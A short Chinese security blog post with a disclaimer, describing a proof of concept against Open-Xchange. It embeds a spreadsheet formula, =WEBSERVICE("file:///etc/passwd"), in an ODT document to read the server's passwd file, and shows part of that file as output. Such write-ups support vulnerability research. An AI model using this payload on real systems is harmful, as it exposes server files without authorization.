ODT文件漏洞利用

文章预览

声明： 文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章作者不承担任何法律及连带责任。 博客新域名： https://gugesay.com 不想错过任何消息？设置星标 ↓ ↓ ↓ 1、建立一个openoffice的calc文件（ods文件格式） 2、在任意表格中输入： =WEBSERVICE("file:///etc/passwd") 3、建立一个新的odt文件 4、选择插入（insert）–>对象（object）–>导入刚刚创建的ods文件 5、将该odt文件“通过驱动器”功能打开，即可在open-Xchange中查看到open-Xchange服务器上的passwd内容 bin2:2:bin:/bin:/usr/sbin/nologin sys3:3:sys:/dev:/usr/sbin/nologin sync4:65534:sync:/bin:/bin/sync games5:60:games:/usr/games:/usr/sbin/nologin man6:12/var/cache/man:/usr/sbin/nologin lp7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail8:8:mail:/var/mail:/usr/sbin/nologin news9:9:news:/var/spool/news:/us ………………………………